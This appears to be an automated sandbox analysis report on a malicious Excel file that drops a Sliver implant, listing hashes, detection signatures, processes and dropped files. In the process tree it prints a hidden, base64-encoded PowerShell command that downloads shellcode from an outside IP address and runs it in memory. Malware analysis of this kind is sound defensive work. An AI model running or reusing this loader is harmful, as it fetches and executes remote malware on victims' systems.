Analysis

  • max time kernel
    58s
  • max time network
    60s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 21:19

General

  • Target

    dd7bfe767125a34afa55304846fefefaa8f0ea0af79aba9675f5883f8e145ef3.xls

  • Size

    46KB

  • MD5

    e97afc97d2da6d145efc00d210d60e4c

  • SHA1

    59475d809d54df8e563c497fdf3906ad6e59a1bb

  • SHA256

    dd7bfe767125a34afa55304846fefefaa8f0ea0af79aba9675f5883f8e145ef3

  • SHA512

    cf560e0642b4b2b57ec20a0015d7efbb2e0d4246e542150ad46f6947996a5e3d2488e2dac99fce428a84cd18270a4e8d2ee12c7848813745a47f4a0591375584

  • SSDEEP

    768:H4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:YSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Sliver RAT v2 6 IoCs
  • Sliver family
  • SliverRAT

    SliverRAT is an open source Adversary Emulation Framework.

  • Blocklisted process makes network request 26 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dd7bfe767125a34afa55304846fefefaa8f0ea0af79aba9675f5883f8e145ef3.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m54vc4k4\m54vc4k4.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2436
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DBB.tmp" "c:\Users\Admin\AppData\Local\Temp\m54vc4k4\CSCDF90BF6DFFA94704A53AADA44C79BA5D.TMP"
          4⤵
            PID:644

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES7DBB.tmp

      Filesize

      1KB

      MD5

      7cff88844fc187ef4a6118ab23b4feef

      SHA1

      50206f53d9b04f2574c7542e015d93a1c18b5d84

      SHA256

      72b154376746cab3cd42b9a16110d022dcd24dda7a824b2ade127816cee7885e

      SHA512

      6bf7a48140ee20460109cfe0d1222c9ea2337f8c9dcaaf409f6375cb5b6a9225dda31e2782ae1e6bab69ee72f50c0edb8696f78d4ac553ffe46a796cda0b15fc

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rm5qjlla.uc5.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\m54vc4k4\m54vc4k4.dll

      Filesize

      3KB

      MD5

      4dab5058d2e2abcaac37d8eb40e8f014

      SHA1

      0d18adcf718206e64ad8d104c2ef8d91dd90f450

      SHA256

      a3ddfe647d269664c78705cc411e0e62fdc201be9b19acce6480867936518997

      SHA512

      45925ecd0652bbb3afb904659cc3a02bea60f85822fc31866eb450444e4dbec07ac86961e316245836b0b7a0d66249a7f2a0932188d7051a169319fd544adc43

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

      Filesize

      1KB

      MD5

      3176cc279e7468a2b8d58b1349e322d4

      SHA1

      85128b996341f4ea4a7117812e12d8ba5abdf475

      SHA256

      cd30b18f73d5bae81eff6fe402273554b5b193747572adffd73167e9ab6125e4

      SHA512

      6ace3a1a9c594204d28280cab027ff1e49519f36e3bc3301818dea1c6746f14c4939bf80c342d65e52ee1704187e425ab9a08a98b5bd539438447a23a22bdb2a

    • \??\c:\Users\Admin\AppData\Local\Temp\m54vc4k4\CSCDF90BF6DFFA94704A53AADA44C79BA5D.TMP

      Filesize

      652B

      MD5

      99da4d57417369891c977059c9c9a35d

      SHA1

      558b672cad326006ca5c9d644605682045c05996

      SHA256

      c8af18e23cbbd67eab7ac46aa3af7bfb9c19f07353113b935d8fd8a61f59b934

      SHA512

      084d0bc82f66ec542e4aa4d74852715c89a88356f7ca040a2862980194287773dbd2b7ae0e130b1480f3dc3acb1537ef1eb5843e85f022c2c89e152c40717b8c

    • \??\c:\Users\Admin\AppData\Local\Temp\m54vc4k4\m54vc4k4.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\m54vc4k4\m54vc4k4.cmdline

      Filesize

      369B

      MD5

      f7f0fa71c49878b90afd13fbe338d524

      SHA1

      4e54ace7507188c8a1afbb110003af7d6e4de47d

      SHA256

      136b4c2f0f5daa066f48019019871880848ce7aea20e9f9039d88e20554e8bda

      SHA512

      351f92704eea2c75bbed28f4b75aacb1e9edfb36ac414a0a196b69ae63c524ea41cd10c1493a8b6ede3906d862033db995f645e79a91c60206ba07bdf4c3052f

    • memory/2972-75-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp

      Filesize

      10.9MB

    • memory/2972-73-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp

      Filesize

      10.9MB

    • memory/2972-72-0x00000263DC1E0000-0x00000263DCC5E000-memory.dmp

      Filesize

      10.5MB

    • memory/2972-74-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp

      Filesize

      10.9MB

    • memory/2972-57-0x00000263C3220000-0x00000263C3228000-memory.dmp

      Filesize

      32KB

    • memory/2972-76-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp

      Filesize

      10.9MB

    • memory/2972-77-0x00000263DE1D0000-0x00000263DE1F7000-memory.dmp

      Filesize

      156KB

    • memory/2972-81-0x00000263DD6E0000-0x00000263DE1C6000-memory.dmp

      Filesize

      10.9MB

    • memory/2972-41-0x00000263C35F0000-0x00000263C3612000-memory.dmp

      Filesize

      136KB

    • memory/4716-9-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-1-0x00007FFBA05ED000-0x00007FFBA05EE000-memory.dmp

      Filesize

      4KB

    • memory/4716-27-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-26-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-17-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-16-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-14-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-13-0x00007FFB5DC70000-0x00007FFB5DC80000-memory.dmp

      Filesize

      64KB

    • memory/4716-12-0x00007FFB5DC70000-0x00007FFB5DC80000-memory.dmp

      Filesize

      64KB

    • memory/4716-10-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-11-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-15-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-61-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-62-0x00007FFBA05ED000-0x00007FFBA05EE000-memory.dmp

      Filesize

      4KB

    • memory/4716-8-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-68-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-5-0x00007FFB605D0000-0x00007FFB605E0000-memory.dmp

      Filesize

      64KB

    • memory/4716-4-0x00007FFB605D0000-0x00007FFB605E0000-memory.dmp

      Filesize

      64KB

    • memory/4716-7-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-6-0x00007FFBA0550000-0x00007FFBA0745000-memory.dmp

      Filesize

      2.0MB

    • memory/4716-3-0x00007FFB605D0000-0x00007FFB605E0000-memory.dmp

      Filesize

      64KB

    • memory/4716-0-0x00007FFB605D0000-0x00007FFB605E0000-memory.dmp

      Filesize

      64KB

    • memory/4716-2-0x00007FFB605D0000-0x00007FFB605E0000-memory.dmp

      Filesize

      64KB